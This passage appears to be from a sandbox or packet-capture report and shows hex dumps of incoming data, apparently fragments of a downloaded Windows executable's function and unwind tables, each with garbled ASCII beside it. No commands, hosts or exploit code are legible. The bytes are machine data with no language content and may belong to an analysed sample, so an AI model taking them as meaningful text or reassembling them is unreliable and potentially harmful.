                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7665INData Raw: d4 12 00 3c 5e 7b 00 60 d4 12 00 6f d4 12 00 4c 5e 7b 00 70 d4 12 00 96 d4 12 00 50 5e 7b 00 a0 d4 12 00 66 d5 12 00 58 5e 7b 00 70 d5 12 00 7c d5 12 00 6c 5e 7b 00 80 d5 12 00 4b d6 12 00 70 5e 7b 00 50 d6 12 00 a7 d6 12 00 98 5e 7b 00 b0 d6 12 00 09 d7 12 00 a0 5e 7b 00 10 d7 12 00 12 e0 12 00 a8 5e 7b 00 20 e0 12 00 39 e0 12 00 4c 5f 7b 00 40 e0 12 00 d3 e1 12 00 50 5f 7b 00 e0 e1 12 00 5a e2 12 00 60 5f 7b 00 60 e2 12 00 e4 e3 12 00 6c 5f 7b 00 f0 e3 12 00 4c e9 12 00 84 5f 7b 00 50 e9 12 00 c5 ea 12 00 c8 5f 7b 00 d0 ea 12 00 d4 eb 12 00 d8 5f 7b 00 e0 eb 12 00 ff eb 12 00 28 60 7b 00 00 ec 12 00 08 ec 12 00 2c 60 7b 00 10 ec 12 00 c9 ec 12 00 30 60 7b 00 d0 ec 12 00 6d ed 12 00 40 60 7b 00 70 ed 12 00 2f ef 12 00 4c 60 7b 00 30 ef 12 00 52 ef 12 00
                                                                                                                                                                                                                    Data Ascii: <^{`oL^{pP^{fX^{p|l^{Kp^{P^{^{^{ 9L_{@P_{Z`_{`l_{L_{P_{_{(`{,`{0`{m@`{p/L`{0R
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7681INData Raw: 99 7b 00 c0 a8 19 00 cc a8 19 00 84 99 7b 00 d0 a8 19 00 dc a8 19 00 88 99 7b 00 e0 a8 19 00 ec a8 19 00 8c 99 7b 00 f0 a8 19 00 6f a9 19 00 90 99 7b 00 70 a9 19 00 cb a9 19 00 9c 99 7b 00 d0 a9 19 00 d5 a9 19 00 ac 99 7b 00 e0 a9 19 00 03 aa 19 00 b0 99 7b 00 10 aa 19 00 df ac 19 00 b8 99 7b 00 e0 ac 19 00 c3 af 19 00 d0 99 7b 00 d0 af 19 00 d1 bb 19 00 e8 99 7b 00 e0 bb 19 00 b2 c7 19 00 00 9a 7b 00 c0 c7 19 00 2b cc 19 00 18 9a 7b 00 30 cc 19 00 5b d0 19 00 30 9a 7b 00 60 d0 19 00 75 d0 19 00 48 9a 7b 00 80 d0 19 00 11 d1 19 00 4c 9a 7b 00 20 d1 19 00 9c d1 19 00 58 9a 7b 00 a0 d1 19 00 cf d1 19 00 64 9a 7b 00 d0 d1 19 00 55 d6 19 00 70 9a 7b 00 60 d6 19 00 a9 da 19 00 84 9a 7b 00 b0 da 19 00 ab db 19 00 9c 9a 7b 00 b0 db 19 00 fa e1 19 00 b0 9a 7b 00
                                                                                                                                                                                                                    Data Ascii: {{{{o{p{{{{{{{+{0[0{`uH{L{ X{d{Up{`{{{
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7697INData Raw: ab 1e 00 08 ab 1e 00 54 cd 7b 00 10 ab 1e 00 18 ab 1e 00 58 cd 7b 00 20 ab 1e 00 28 ab 1e 00 5c cd 7b 00 30 ab 1e 00 38 ab 1e 00 60 cd 7b 00 40 ab 1e 00 48 ab 1e 00 64 cd 7b 00 50 ab 1e 00 58 ab 1e 00 68 cd 7b 00 60 ab 1e 00 68 ab 1e 00 6c cd 7b 00 70 ab 1e 00 78 ab 1e 00 70 cd 7b 00 80 ab 1e 00 88 ab 1e 00 74 cd 7b 00 90 ab 1e 00 98 ab 1e 00 78 cd 7b 00 a0 ab 1e 00 a8 ab 1e 00 7c cd 7b 00 b0 ab 1e 00 b8 ab 1e 00 80 cd 7b 00 c0 ab 1e 00 c8 ab 1e 00 84 cd 7b 00 d0 ab 1e 00 d8 ab 1e 00 88 cd 7b 00 e0 ab 1e 00 e8 ab 1e 00 8c cd 7b 00 f0 ab 1e 00 f8 ab 1e 00 90 cd 7b 00 00 ac 1e 00 08 ac 1e 00 94 cd 7b 00 10 ac 1e 00 18 ac 1e 00 98 cd 7b 00 20 ac 1e 00 28 ac 1e 00 9c cd 7b 00 30 ac 1e 00 38 ac 1e 00 a0 cd 7b 00 40 ac 1e 00 48 ac 1e 00 a4 cd 7b 00 50 ac 1e 00
                                                                                                                                                                                                                    Data Ascii: T{X{ (\{08`{@Hd{PXh{`hl{pxp{t{x{|{{{{{{{{ ({08{@H{P
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7713INData Raw: 04 25 00 f4 01 7c 00 60 04 25 00 b3 04 25 00 00 02 7c 00 c0 04 25 00 29 05 25 00 0c 02 7c 00 30 05 25 00 07 06 25 00 18 02 7c 00 10 06 25 00 92 06 25 00 24 02 7c 00 a0 06 25 00 d8 07 25 00 30 02 7c 00 e0 07 25 00 17 0a 25 00 44 02 7c 00 20 0a 25 00 7b 0a 25 00 54 02 7c 00 80 0a 25 00 0c 0b 25 00 60 02 7c 00 10 0b 25 00 35 0b 25 00 6c 02 7c 00 40 0b 25 00 31 0c 25 00 70 02 7c 00 40 0c 25 00 7a 0d 25 00 84 02 7c 00 80 0d 25 00 0e 0e 25 00 90 02 7c 00 10 0e 25 00 c3 0e 25 00 9c 02 7c 00 d0 0e 25 00 34 0f 25 00 ac 02 7c 00 40 0f 25 00 87 10 25 00 b8 02 7c 00 90 10 25 00 de 13 25 00 c8 02 7c 00 e0 13 25 00 a3 16 25 00 e0 02 7c 00 b0 16 25 00 a5 1b 25 00 f8 02 7c 00 b0 1b 25 00 9d 1d 25 00 10 03 7c 00 a0 1d 25 00 fd 1d 25 00 28 03 7c 00 00 1e 25 00 76 1e 25 00
                                                                                                                                                                                                                    Data Ascii: %|`%%|%)%|0%%|%%$|%%0|%%D| %{%T|%%`|%5%l|@%1%p|@%z%|%%|%%|%4%|@%%|%%|%%|%%|%%|%%(|%v%
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7729INData Raw: 36 7c 00 50 19 2a 00 65 19 2a 00 3c 36 7c 00 70 19 2a 00 93 19 2a 00 40 36 7c 00 a0 19 2a 00 a4 1a 2a 00 48 36 7c 00 b0 1a 2a 00 b3 1a 2a 00 b8 36 7c 00 c0 1a 2a 00 c4 1a 2a 00 bc 36 7c 00 d0 1a 2a 00 eb 1a 2a 00 c0 36 7c 00 f0 1a 2a 00 23 1b 2a 00 c4 36 7c 00 30 1b 2a 00 33 1b 2a 00 c8 36 7c 00 40 1b 2a 00 48 1b 2a 00 cc 36 7c 00 50 1b 2a 00 52 1c 2a 00 d0 36 7c 00 60 1c 2a 00 49 1d 2a 00 d8 36 7c 00 50 1d 2a 00 f8 1d 2a 00 e0 36 7c 00 00 1e 2a 00 0a 1e 2a 00 e4 36 7c 00 10 1e 2a 00 4e 1e 2a 00 e8 36 7c 00 50 1e 2a 00 8e 1e 2a 00 ec 36 7c 00 90 1e 2a 00 9b 23 2a 00 f0 36 7c 00 a0 23 2a 00 03 25 2a 00 f8 36 7c 00 10 25 2a 00 36 29 2a 00 00 37 7c 00 40 29 2a 00 6e 2a 2a 00 08 37 7c 00 70 2a 2a 00 30 2b 2a 00 10 37 7c 00 30 2b 2a 00 3d 2c 2a 00 24 37 7c 00
                                                                                                                                                                                                                    Data Ascii: 6|P*e*<6|p**@6|**H6|**6|**6|**6|*#*6|0*3*6|@*H*6|P*R*6|`*I*6|P**6|**6|*N*6|P**6|*#*6|#*%*6|%*6)*7|@)*n**7|p**0+*7|0+*=,*$7|
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7745INData Raw: f2 33 00 29 f2 33 00 30 76 7c 00 30 f2 33 00 4c f4 33 00 34 76 7c 00 50 f4 33 00 dd f4 33 00 4c 76 7c 00 e0 f4 33 00 ed f4 33 00 5c 76 7c 00 f0 f4 33 00 39 f6 33 00 60 76 7c 00 40 f6 33 00 c4 fb 33 00 70 76 7c 00 d0 fb 33 00 75 fc 33 00 88 76 7c 00 80 fc 33 00 70 fe 33 00 98 76 7c 00 70 fe 33 00 91 fe 33 00 a8 76 7c 00 a0 fe 33 00 e2 fe 33 00 ac 76 7c 00 f0 fe 33 00 32 ff 33 00 b4 76 7c 00 40 ff 33 00 9c ff 33 00 bc 76 7c 00 a0 ff 33 00 d0 ff 33 00 c8 76 7c 00 d0 ff 33 00 e9 ff 33 00 d4 76 7c 00 f0 ff 33 00 b7 00 34 00 d8 76 7c 00 c0 00 34 00 f7 00 34 00 e8 76 7c 00 00 01 34 00 47 01 34 00 f0 76 7c 00 50 01 34 00 00 02 34 00 f8 76 7c 00 00 02 34 00 d3 02 34 00 08 77 7c 00 e0 02 34 00 36 03 34 00 18 77 7c 00 40 03 34 00 96 03 34 00 20 77 7c 00 a0 03 34 00
                                                                                                                                                                                                                    Data Ascii: 3)30v|03L34v|P33Lv|33\v|393`v|@33pv|3u3v|3p3v|p33v|33v|323v|@33v|33v|33v|34v|44v|4G4v|P44v|44w|464w|@44 w|4
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7761INData Raw: 19 3d 00 60 bc 7c 00 27 19 3d 00 df 19 3d 00 78 bc 7c 00 df 19 3d 00 0a 42 3d 00 88 bc 7c 00 0a 42 3d 00 c2 42 3d 00 a0 bc 7c 00 c2 42 3d 00 86 44 3d 00 b0 bc 7c 00 86 44 3d 00 8e 46 3d 00 c0 bc 7c 00 8e 46 3d 00 08 47 3d 00 d4 bc 7c 00 08 47 3d 00 0d 47 3d 00 d8 bc 7c 00 0d 47 3d 00 2c 47 3d 00 dc bc 7c 00 2c 47 3d 00 43 47 3d 00 e4 bc 7c 00 43 47 3d 00 bd 47 3d 00 ec bc 7c 00 bd 47 3d 00 c2 47 3d 00 f0 bc 7c 00 c2 47 3d 00 e1 47 3d 00 f4 bc 7c 00 e1 47 3d 00 f8 47 3d 00 fc bc 7c 00 f8 47 3d 00 ca 48 3d 00 04 bd 7c 00 ca 48 3d 00 cf 48 3d 00 08 bd 7c 00 cf 48 3d 00 ee 48 3d 00 0c bd 7c 00 ee 48 3d 00 05 49 3d 00 14 bd 7c 00 05 49 3d 00 d7 49 3d 00 1c bd 7c 00 d7 49 3d 00 dc 49 3d 00 20 bd 7c 00 dc 49 3d 00 fb 49 3d 00 24 bd 7c 00 fb 49 3d 00 12 4a 3d 00
                                                                                                                                                                                                                    Data Ascii: =`|'==x|=B=|B=B=|B=D=|D=F=|F=G=|G=G=|G=,G=|,G=CG=|CG=G=|G=G=|G=G=|G=G=|G=H=|H=H=|H=H=|H=I=|I=I=|I=I= |I=I=$|I=J=
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7777INData Raw: a1 7a 00 40 13 50 00 2e 14 50 00 ac 9b 7a 00 30 14 50 00 15 15 50 00 74 9c 7a 00 20 15 50 00 05 16 50 00 90 9d 7a 00 10 16 50 00 04 19 50 00 ac a2 7a 00 10 19 50 00 60 1a 50 00 94 9e 7a 00 60 1a 50 00 8f 1b 50 00 30 9e 7a 00 90 1b 50 00 91 1b 50 00 5c 9b 7a 00 a0 1b 50 00 6b 23 50 00 dc a2 7a 00 70 23 50 00 cf 26 50 00 58 9e 7a 00 d0 26 50 00 82 28 50 00 6c 9e 7a 00 90 28 50 00 db 32 50 00 84 9e 7a 00 e0 32 50 00 ad 34 50 00 44 9e 7a 00 b0 34 50 00 d5 38 50 00 74 a2 7a 00 e0 38 50 00 05 3d 50 00 3c a2 7a 00 10 3d 50 00 fe 3d 50 00 88 9c 7a 00 00 3e 50 00 e5 3e 50 00 60 9c 7a 00 f0 3e 50 00 d5 3f 50 00 18 9e 7a 00 e0 3f 50 00 d6 42 50 00 78 a3 7a 00 e0 42 50 00 30 44 50 00 1c 9f 7a 00 30 44 50 00 5f 45 50 00 b8 9e 7a 00 60 45 50 00 61 45 50 00 70 9b 7a 00
                                                                                                                                                                                                                    Data Ascii: z@P.Pz0PPtz PPzPPzP`Pz`PP0zPP\zPk#Pzp#P&PXz&P(Plz(P2Pz2P4PDz4P8Ptz8P=P<z=P=Pz>P>P`z>P?Pz?PBPxzBP0DPz0DP_EPz`EPaEPpz
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7793INData Raw: bc 56 00 3a bd 56 00 04 a9 7d 00 40 bd 56 00 9a bd 56 00 30 a9 7d 00 a0 bd 56 00 d8 bd 56 00 3c a8 7d 00 e0 bd 56 00 18 be 56 00 cc a7 7d 00 20 be 56 00 5a be 56 00 84 a8 7d 00 60 be 56 00 9a be 56 00 b0 a8 7d 00 a0 be 56 00 95 bf 56 00 48 74 7a 00 a0 bf 56 00 26 c0 56 00 14 9a 7a 00 30 c0 56 00 b6 c0 56 00 a0 b0 7a 00 c0 c0 56 00 46 c1 56 00 04 df 7a 00 50 c1 56 00 58 c1 56 00 08 b5 7d 00 60 c1 56 00 65 c1 56 00 14 c0 7d 00 70 c1 56 00 75 c1 56 00 0c be 7d 00 80 c1 56 00 84 c1 56 00 50 5e 7d 00 90 c1 56 00 b5 c1 56 00 54 5e 7d 00 c0 c1 56 00 ee c1 56 00 34 5e 7d 00 f0 c1 56 00 13 c2 56 00 2c 5e 7d 00 20 c2 56 00 43 c2 56 00 30 5e 7d 00 50 c2 56 00 6b c2 56 00 3c 5e 7d 00 70 c2 56 00 bb c2 56 00 3c bc 7d 00 c0 c2 56 00 c3 c2 56 00 80 54 7d 00 d0 c2 56 00
                                                                                                                                                                                                                    Data Ascii: V:V}@VV0}VV<}VV} VZV}`VV}VVHtzV&Vz0VVzVFVzPVXV}`VeV}pVuV}VVP^}VVT^}VV4^}VV,^} VCV0^}PVkV<^}pVV<}VVT}V
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7809INData Raw: 6d 5a 00 30 23 7a 00 50 6d 5a 00 99 6d 5a 00 fc 22 7a 00 a0 6d 5a 00 f4 6d 5a 00 24 23 7a 00 00 6e 5a 00 49 6e 5a 00 00 23 7a 00 50 6e 5a 00 df 6e 5a 00 ac 23 7a 00 e0 6e 5a 00 29 6f 5a 00 04 23 7a 00 30 6f 5a 00 bf 6f 5a 00 88 23 7a 00 c0 6f 5a 00 ea 6f 5a 00 98 1f 7a 00 f0 6f 5a 00 02 70 5a 00 94 1f 7a 00 10 70 5a 00 59 70 5a 00 08 23 7a 00 60 70 5a 00 72 70 5a 00 9c 1f 7a 00 80 70 5a 00 c9 70 5a 00 0c 23 7a 00 d0 70 5a 00 3f 71 5a 00 54 23 7a 00 40 71 5a 00 89 71 5a 00 10 23 7a 00 90 71 5a 00 ff 71 5a 00 64 23 7a 00 00 72 5a 00 49 72 5a 00 14 23 7a 00 50 72 5a 00 5a 72 5a 00 a0 1f 7a 00 60 72 5a 00 b1 72 5a 00 18 23 7a 00 c0 72 5a 00 ca 72 5a 00 a4 1f 7a 00 d0 72 5a 00 21 73 5a 00 1c 23 7a 00 30 73 5a 00 60 73 5a 00 48 23 7a 00 60 73 5a 00 b1 73 5a 00
                                                                                                                                                                                                                    Data Ascii: mZ0#zPmZmZ"zmZmZ$#znZInZ#zPnZnZ#znZ)oZ#z0oZoZ#zoZoZzoZpZzpZYpZ#z`pZrpZzpZpZ#zpZ?qZT#z@qZqZ#zqZqZd#zrZIrZ#zPrZZrZz`rZrZ#zrZrZzrZ!sZ#z0sZ`sZH#z`sZsZ
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7825INData Raw: bc 7d 00 c0 c4 5e 00 15 c5 5e 00 08 bf 7d 00 20 c5 5e 00 80 c5 5e 00 5c d6 7c 00 80 c5 5e 00 e0 c5 5e 00 58 d6 7c 00 e0 c5 5e 00 2e c6 5e 00 54 d6 7c 00 30 c6 5e 00 7e c6 5e 00 50 d6 7c 00 80 c6 5e 00 96 c6 5e 00 14 c8 7c 00 a0 c6 5e 00 06 c7 5e 00 d0 23 7a 00 10 c7 5e 00 21 c7 5e 00 1c c8 7c 00 30 c7 5e 00 57 c7 5e 00 74 d6 7c 00 60 c7 5e 00 b4 c7 5e 00 60 d6 7c 00 c0 c7 5e 00 14 c8 5e 00 64 d6 7c 00 20 c8 5e 00 2d c9 5e 00 5c bd 7d 00 30 c9 5e 00 4e ca 5e 00 6c bd 7d 00 50 ca 5e 00 c1 ca 5e 00 60 c0 7d 00 d0 ca 5e 00 4f cb 5e 00 18 bc 7d 00 50 cb 5e 00 27 cc 5e 00 50 c0 7d 00 30 cc 5e 00 3c cc 5e 00 68 c0 7d 00 40 cc 5e 00 d6 cc 5e 00 90 38 7d 00 e0 cc 5e 00 70 cd 5e 00 2c da 7c 00 70 cd 5e 00 9a d2 5e 00 6c d6 7c 00 a0 d2 5e 00 7f d5 5e 00 68 d6 7c 00
                                                                                                                                                                                                                    Data Ascii: }^^} ^^\|^^X|^.^T|0^~^P|^^|^^#z^!^|0^W^t|`^^`|^^d| ^-^\}0^N^l}P^^`}^O^}P^'^P}0^<^h}@^^8}^p^,|p^^l|^^h|
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7841INData Raw: d0 04 e0 02 f0 00 00 01 10 09 00 10 a2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 10 09 00 10 a2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 10 09 00 10 a2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 10 09 00 10 a2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 00 00 00 01 04 01 00 04 42 00 00 19 12 09 00 12 01 1c 00 0b 30 0a 60 09 70 08 c0 06 d0 04 e0 02 f0 00 00 90 57 5f 00 ff ff 01 3b 70 05 9f 0f 00 84 01 05 fc 0e 00 f0 01 33 a4 0f 00 ae 04 3b b7 0f 00 b1 05 44 c4 0e 00 87 06 05 a4 0f 00 d5 08 a3 01 c4 0e 00 ae 0c 05 a4 0f 00 d7 0c 05 b7 0f 00 9a 0f 1d 00 00 00 19 13 0a 00 13 01 17 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 90 57 5f 00 ff ff 01 18 a7 01 05 ab 0a 00 bb 01 05 8b 0a 00 80 05 e5 04
                                                                                                                                                                                                                    Data Ascii: 0`pP0`pP0`pP0`pPB0`pW_;p3;D0`pPW_
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7857INData Raw: b5 0b 05 c0 18 00 89 0d 05 ea 18 00 92 0d 94 02 8f 1a 00 c1 10 05 9f 18 00 e3 10 05 b7 1a 00 86 11 03 8f 1a 00 db 13 05 b5 1a 00 b3 14 05 97 1a 00 8d 15 05 8f 1a 00 a0 15 02 00 00 e8 15 05 9f 18 00 96 16 6e 00 00 bc 17 05 b5 1a 00 e3 17 2d 00 00 00 01 0a 05 00 0a 42 06 30 05 60 04 c0 02 d0 00 00 01 0a 05 00 0a 42 06 30 05 60 04 c0 02 d0 00 00 01 09 05 00 09 42 05 30 04 60 03 70 02 c0 00 00 01 09 05 00 09 42 05 30 04 60 03 70 02 c0 00 00 01 0c 06 00 0c 32 08 30 07 60 06 c0 04 d0 02 e0 01 0c 06 00 0c 32 08 30 07 60 06 c0 04 d0 02 e0 01 00 00 00 01 00 00 00 01 00 00 00 19 0b 06 00 0b 72 07 30 06 60 05 70 04 c0 02 d0 90 57 5f 00 ff ff 01 0f 1b 27 00 00 cd 01 05 b6 02 00 85 02 57 00 00 00 01 04 01 00 04 42 00 00 01 10 09 00 10 42 0c 30 0b 60 0a 70 09 50 08 c0
                                                                                                                                                                                                                    Data Ascii: n-B0`B0`B0`pB0`p20`20`r0`pW_'WBB0`pP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7873INData Raw: e0 00 00 01 0a 06 00 0a 32 06 30 05 60 04 70 03 50 02 c0 01 0a 06 00 0a 32 06 30 05 60 04 70 03 50 02 c0 01 09 05 00 09 42 05 30 04 60 03 70 02 c0 00 00 01 08 04 00 08 52 04 30 03 60 02 c0 01 10 09 00 10 42 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 0e 08 00 0e 32 0a 30 09 60 08 70 07 50 06 c0 04 d0 02 e0 19 0a 05 00 0a 42 06 30 05 60 04 c0 02 d0 00 00 90 57 5f 00 ff ff 01 19 14 05 00 00 27 05 9a 01 00 8e 01 05 00 00 95 01 05 9a 01 00 a8 01 06 00 00 00 00 00 19 13 0a 00 13 01 3d 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 90 57 5f 00 ff ff 01 27 40 05 00 00 be 01 05 8d 07 00 e5 03 05 f0 07 00 f0 03 05 c4 07 00 a4 04 05 8e 08 00 90 06 46 f0 06 00 bf 07 63 00 00 00 19 13 0a 00 13 01 3d 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0
                                                                                                                                                                                                                    Data Ascii: 20`pP20`pPB0`pR0`B0`pP20`pPB0`W_'=0`pPW_'@Fc=0`pP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7889INData Raw: 00 00 00 01 0a 06 00 0a 32 06 30 05 60 04 70 03 50 02 c0 01 09 05 00 09 42 05 30 04 60 03 70 02 c0 00 00 01 08 04 00 08 52 04 30 03 60 02 c0 01 10 09 00 10 42 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 0e 08 00 0e 32 0a 30 09 60 08 70 07 50 06 c0 04 d0 02 e0 01 00 00 00 01 00 00 00 01 20 0f 00 20 88 06 00 1a 78 05 00 15 68 04 00 10 e2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 19 29 10 00 29 88 09 00 20 78 08 00 18 68 07 00 13 01 15 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 90 57 5f 00 ff ff 01 10 50 05 00 00 c4 04 d2 08 96 0d 00 a6 0d 06 00 00 19 13 0a 00 13 01 3d 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 90 57 5f 00 ff ff 01 27 40 05 00 00 be 01 05 8d 07 00 e5 03 05 f0 07 00 f0 03 05 c4 07 00 a4 04 05 8e 08 00
                                                                                                                                                                                                                    Data Ascii: 20`pPB0`pR0`B0`pP20`pP xh0`pP)) xh0`pPW_P=0`pPW_'@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7905INData Raw: b8 10 00 3e a8 0f 00 35 98 0e 00 2c 88 0d 00 23 78 0c 00 1b 68 0b 00 13 01 2b 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 3e 14 00 3e a8 0c 00 35 98 0b 00 2c 88 0a 00 23 78 09 00 1b 68 08 00 13 01 1b 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 6b 1e 00 6b f8 11 00 62 e8 10 00 59 d8 0f 00 50 c8 0e 00 47 b8 0d 00 3e a8 0c 00 35 98 0b 00 2c 88 0a 00 23 78 09 00 1b 68 08 00 13 01 25 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 56 1a 00 56 d8 0e 00 4d c8 0d 00 44 b8 0c 00 3b a8 0b 00 32 98 0a 00 29 88 09 00 20 78 08 00 18 68 07 00 13 01 1f 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 38 14 00 38 a8 0a 00 2f 98 09 00 26 88 08 00 1d 78 07 00 18 68 06 00 13 01 17 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 13 0a 00
                                                                                                                                                                                                                    Data Ascii: >5,#xh+0`pP>>5,#xh0`pPkkbYPG>5,#xh%0`pPVVMD;2) xh0`pP88/&xh0`pP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7921INData Raw: 52 01 30 01 00 00 00 01 00 00 00 01 06 03 00 06 42 02 30 01 60 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 0a 06 00 0a 52 06 30 05 60 04 70 03 50 02 c0 01 00 00 00 01 06 02 00 06 32 02 c0 01 00 00 00 01 00 00 00 01 00 00 00 01 10 09 00 10 82 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 10 09 00 10 82 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 0c 07 00 0c 62 08 30 07 60 06 70 05 50 04 c0 02 d0 00 00 01 10 09 00 10 a2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 10 09 00 10 c2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 06 02 00
                                                                                                                                                                                                                    Data Ascii: R0B0`R0`pP20`pP0`pPb0`pP0`pP0`pP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7937INData Raw: 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 06 02 00 06 32 02 c0 01 00 00 00 01 00 00 00 01 05 02 00 05 32 01 30 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 09 05 00 09 62 05 30 04 60 03 70 02 c0 00 00 01 00 00 00 01 00 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 09 04 00 09 52 05 30 04 c0 02 d0 01 0a 04 00 0a 52 06 c0 04 d0 02 e0 01 0e 07 00 0e 62 0a 30 09 60 08 c0 06 d0 04 e0 02 f0 00 00 01 0a 04 00 0a 52 06 c0 04 d0 02 e0 01 06 02 00 06 32 02 c0 01 06 02 00 06 32 02 c0 01 04 01 00 04 62 00 00 01 0b 05 00 0b 62 07 30 06 c0 04 d0 02 e0 00 00 01 00 00 00
                                                                                                                                                                                                                    Data Ascii: 220b0`pbbbbbbbbR0Rb0`R22bb0
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7953INData Raw: 60 08 70 07 50 06 c0 04 d0 02 e0 01 00 00 00 01 05 02 00 05 32 01 30 01 04 01 00 04 42 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 10 09 00 10 c2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 04 01 00 04 62 00 00 01 04 01 00 04 62 00 00 01 00 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 05 02 00 05 32 01 30 01 10 09 00 10 82 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 07 03 00 07 42 03 30 02 c0 00 00 01 13 0a 00 13 01 13 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 04 01 00
                                                                                                                                                                                                                    Data Ascii: `pP20BB0`pPbbB200`pPB00`pP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7969INData Raw: 60 08 c0 06 d0 04 e0 02 f0 00 00 01 07 03 00 07 62 03 30 02 c0 00 00 01 08 04 00 08 52 04 30 03 60 02 c0 01 13 0a 00 13 01 1b 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 06 02 00 06 52 02 d0 01 08 04 00 08 52 04 30 03 60 02 c0 01 10 09 00 10 82 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 07 03 00 07 42 03 30 02 c0 00 00 01 0d 07 00 0d 62 09 30 08 60 07 70 06 c0 04 d0 02 e0 00 00 01 08 04 00 08 52 04 30 03 60 02 c0 01 08 04 00 08 52 04 30 03 60 02 c0 01 07 03 00 07 42 03 30 02 c0 00 00 01 08 05 00 08 62 04 30 03 60 02 70 01 50 00 00 01 0b 05 00 0b 62 07 30 06 c0 04 d0 02 e0 00 00 01 10 09 00 10 c2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 04 01 00 04 42 00 00 01 13 0a 00 13 01 11 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0
                                                                                                                                                                                                                    Data Ascii: `b0R0`0`pPRR0`0`pPB0b0`pR0`R0`B0b0`pPb00`pPB0`pP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7985INData Raw: 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 10 09 00 10 82 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 10 09 00 10 c2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 01 13 0a 00 13 01 23 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 00 00 00 01 07 04 00 07 32 03 30 02 60 01 70 01 04 01 00 04 62 00 00 01 0a 04 00 0a 01 13 00 03 30 02 c0 01 0d 07 00 0d a2 09 30 08 60 07 70 06 c0 04 d0 02 e0 00 00 01 0c 06 00 0c f2 08 30 07 60 06 c0 04 d0 02 e0 01 00 00 00 01 00 00 00 01 06 02 00 06 32 02 c0 01 05 02 00 05 32 01 30 01 05 02 00 05 32 01 30 01 05 02 00 05 32 01 30 01 00 00 00 01 